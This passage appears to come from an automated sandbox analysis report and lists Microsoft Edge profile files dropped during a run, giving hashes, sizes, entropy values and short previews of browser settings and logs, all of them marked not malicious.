                                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.3781739019338193
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:JkIEumQv8m1ccnvS6mvRN+lGFh52Upsfaaw1a:+IEumQv8m1ccnvS6skK2Ups3r
                                                                                                                                                                                                                                                                                                      MD5:82FD8ACF9D8AD165E5640FF3E9FE669F
                                                                                                                                                                                                                                                                                                      SHA1:C624AD4A06B3421206F8E0DEEEE719375E0A5193
                                                                                                                                                                                                                                                                                                      SHA-256:B8AEA21834B5EF3B0E8611CA56C2E319039C6E07E36CB3E35CC29B6EF77DC2EE
                                                                                                                                                                                                                                                                                                      SHA-512:4A29E6D977AFB8745BEAF07FE57043EF1C772EBB930FBF1C57EA7B3F2EB7ADEDC553ABC6BC6A16E5F00DB2E56C1C8524058A1BF5E0436DC45A2B14EC87A86DF5
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF43593.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF44b4d.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\c50cc415-23fb-4dd2-a961-78bd64704666.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                      MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                      SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                      SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                      SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9861
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.106103229085298
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:st4kdpOsd+aFvrE9klcK84bV+F4HQA0U9PwYJ:st4QOsd+CDLbGYQKL
                                                                                                                                                                                                                                                                                                      MD5:AF9A00328A42A2381608832B7207BE40
                                                                                                                                                                                                                                                                                                      SHA1:2B76070CD54CFD74449FE07A0B856A819183CDF7
                                                                                                                                                                                                                                                                                                      SHA-256:5D5E16778A8A905B0D611A9EABF0A4D50B6C3D8D8B5994CB40795190E1929DA6
                                                                                                                                                                                                                                                                                                      SHA-512:0C0BDA0BB20773CB98529C8D7B8AF3852005415EA569D9B22739DD428D56205CCDCC15726B730A6A08D0CA7E689681AF61B4512CE2763B200F624EF994EE8C97
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379444097255566","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF478c6.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9861
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.106103229085298
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:st4kdpOsd+aFvrE9klcK84bV+F4HQA0U9PwYJ:st4QOsd+CDLbGYQKL
                                                                                                                                                                                                                                                                                                      MD5:AF9A00328A42A2381608832B7207BE40
                                                                                                                                                                                                                                                                                                      SHA1:2B76070CD54CFD74449FE07A0B856A819183CDF7
                                                                                                                                                                                                                                                                                                      SHA-256:5D5E16778A8A905B0D611A9EABF0A4D50B6C3D8D8B5994CB40795190E1929DA6
                                                                                                                                                                                                                                                                                                      SHA-512:0C0BDA0BB20773CB98529C8D7B8AF3852005415EA569D9B22739DD428D56205CCDCC15726B730A6A08D0CA7E689681AF61B4512CE2763B200F624EF994EE8C97
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379444097255566","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4bb9b.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):9861
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.106103229085298
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:st4kdpOsd+aFvrE9klcK84bV+F4HQA0U9PwYJ:st4QOsd+CDLbGYQKL
                                                                                                                                                                                                                                                                                                      MD5:AF9A00328A42A2381608832B7207BE40
                                                                                                                                                                                                                                                                                                      SHA1:2B76070CD54CFD74449FE07A0B856A819183CDF7
                                                                                                                                                                                                                                                                                                      SHA-256:5D5E16778A8A905B0D611A9EABF0A4D50B6C3D8D8B5994CB40795190E1929DA6
                                                                                                                                                                                                                                                                                                      SHA-512:0C0BDA0BB20773CB98529C8D7B8AF3852005415EA569D9B22739DD428D56205CCDCC15726B730A6A08D0CA7E689681AF61B4512CE2763B200F624EF994EE8C97
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379444097255566","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):25012
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.567736491219251
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:8ANR90WFBW5wk2f4wnn8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP62IoVL5rwXSpStW:8Wf0kBWak2fRnnu1jazc5KDtW
                                                                                                                                                                                                                                                                                                      MD5:A5083282B24199954FD36BBF017BB304
                                                                                                                                                                                                                                                                                                      SHA1:D95953ADE61F6932DF94B2C294AC8F42FFF72166
                                                                                                                                                                                                                                                                                                      SHA-256:7D7B00171B24B49031D938A6D1D20064C097993532CDCDEC247ECA1D3494B38A
                                                                                                                                                                                                                                                                                                      SHA-512:7BF3CCA36EFEC3D92F3A8EE31589C6C95F6D716F54688EFB087B7AEBC75A56A4FC531BC0BB1831B0B9A8F9BB1478BAAAEBDFA709163A11238BF2D478DD7D0482
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379444096550407","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379444096550407","location":5,"ma

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF4725d.TMP (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):25012
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.567736491219251
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:8ANR90WFBW5wk2f4wnn8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP62IoVL5rwXSpStW:8Wf0kBWak2fRnnu1jazc5KDtW
                                                                                                                                                                                                                                                                                                      MD5:A5083282B24199954FD36BBF017BB304
                                                                                                                                                                                                                                                                                                      SHA1:D95953ADE61F6932DF94B2C294AC8F42FFF72166
                                                                                                                                                                                                                                                                                                      SHA-256:7D7B00171B24B49031D938A6D1D20064C097993532CDCDEC247ECA1D3494B38A
                                                                                                                                                                                                                                                                                                      SHA-512:7BF3CCA36EFEC3D92F3A8EE31589C6C95F6D716F54688EFB087B7AEBC75A56A4FC531BC0BB1831B0B9A8F9BB1478BAAAEBDFA709163A11238BF2D478DD7D0482
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379444096550407","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379444096550407","location":5,"ma

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):2394
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.820030550025573
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:F2xc5NmfBcncmoDCRORpllg2hEBfRHHldCRORpllg2h6d+PFCRORpllg2hEMRHHq:F2emSMrd6BfBRrdod+nrd6MBvCrdyBc
                                                                                                                                                                                                                                                                                                      MD5:BFF08BA0D7D1E116C1D8526E77CE0203
                                                                                                                                                                                                                                                                                                      SHA1:51DB95E441C10158FA1680E95BFF9D0EE61F2340
                                                                                                                                                                                                                                                                                                      SHA-256:D23AD1C373344625E9218A5B06F6D1C5C4E0BBC3C682392A758A16626EE93608
                                                                                                                                                                                                                                                                                                      SHA-512:90533074D401B6929FE73745615F04D0F8E31981AB80E9C1FF62B2864232FB794F10B4C21CD09EF4C1578EEA5692435AA7F8E369EDCEA522951F542FC0702EEF
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2..+..................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):303
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.0941377815747115
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xwQZes1N723oH+TcwtE/a252KLlb2MM+q2PN723oH+TcwtE/a2ZIFUv:xlZJaYeb8xLp2N+vVaYeb8J2FUv
                                                                                                                                                                                                                                                                                                      MD5:46AF853CFD628828276133D53540EA51
                                                                                                                                                                                                                                                                                                      SHA1:1FDD9673CD9676F8D41612DDC561DBDC5298938B
                                                                                                                                                                                                                                                                                                      SHA-256:5598D3AE2B47C69E39AC12557E95109F11B0A36D55D0AEFB7825CBF234DB8948
                                                                                                                                                                                                                                                                                                      SHA-512:F09D9C52C126447E28F7FC1766CEF69E3FE075DA771A43B79A439DF0B7B01479B649117A83512647C9338EF34CD7930424F3BB2404AFAF4F0FAA3D35A961FD06
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:15:12.835 13ac Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/23-11:15:12.852 13ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                      Category:dropped
